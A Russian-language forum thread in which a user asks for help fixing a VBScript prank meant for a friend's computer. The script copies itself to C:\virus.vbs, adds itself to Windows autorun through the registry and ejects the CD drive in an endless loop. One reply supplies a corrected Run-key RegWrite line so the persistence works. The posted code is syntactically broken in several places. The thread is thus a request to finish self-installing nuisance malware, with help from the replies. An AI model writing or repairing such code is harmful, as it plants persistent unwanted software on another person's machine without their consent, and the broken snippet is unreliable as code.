С6
Сергей 69

Вопрос про .vbs

Решил приколоться над другом, сделал так, чтобы дисковод открывался и закрывался, сработало, но я хочу еще чтоб скрит скопировался и добавился в автозагрузку, и тут ошибки. Прошу поправить код. Вот и сам код:

Option Explicit
Dim FileSysObject, File
Set FileSysObject = CreateObject
Set WMPlayer = CreateObject("WMPlayer.OCX.7")
("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
File.Copy (C:\virus.vbs")
WshShell.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\virus", "c:\virus.vbs"
do
WMPlayer.CdRomCollection.Item(0).Eject()
loop

Сергей Кузин

Какие ошибки? Почему не проверяется на уже существование записи в реестре?

Елена Мещанкина

Попробуйте поправить на:
WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\virus", "c:\virus.vbs", "REG_SZ"